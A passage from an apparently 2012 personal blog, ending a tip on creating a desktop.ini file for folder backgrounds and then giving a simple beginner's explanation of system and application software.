  • Save the text document as in the folder where you want the background as "desktop.ini" be sure to remember the .ini extension.
 NOTE:- Don't forget to to write the extension.make sure all the work are done correctly.

thank you :)

9 July 2012

SMALL EXPLANATION ABOUT SOFTWARES

ANSWER:-
Now a day every computer uses software and also many people uses it.but some people use the software without knowing what is it actually.
So here's a simple explanation about software.


SOFTWARE:-
Software is another name for programs. Programs are the instructions that tell the computer to process data into the form you want.  In most cases the words software and programs are interchangeable.  There are two types of software: System software and Application software.

SYSTEM SOFTWARE:-
System software are the software which are used by the computer by its own. System software is not a single program. Rather than it is a collection of programs including some system utility.

Operating system:-
Operating system are the programs that coordinated computer resources, provide an interface between the user and the computer.

Utility:-
Utility performs specific tasks related to managing computer resources. For example the Disk cleanup, Disk defragmenter etc.

Device drivers:-
Device drivers are specialized programs designed to allow particular input and output devices to communicate with the rest of computer system.

APPLICATION SOFTWARE:-
Application software are the end user software. They are of two types i.e. Basic applications and Specialized applications.

Basic applications:-
One of these basic kinds of program is internet explorer a browser. It may come with system software.

Specialized application:-
Specialized software includes other downloadable programs that are more narrowly focused on specific discipline and occupation. Some of the know applications are graphic, audio, video, web authoring programs. 

thank you :)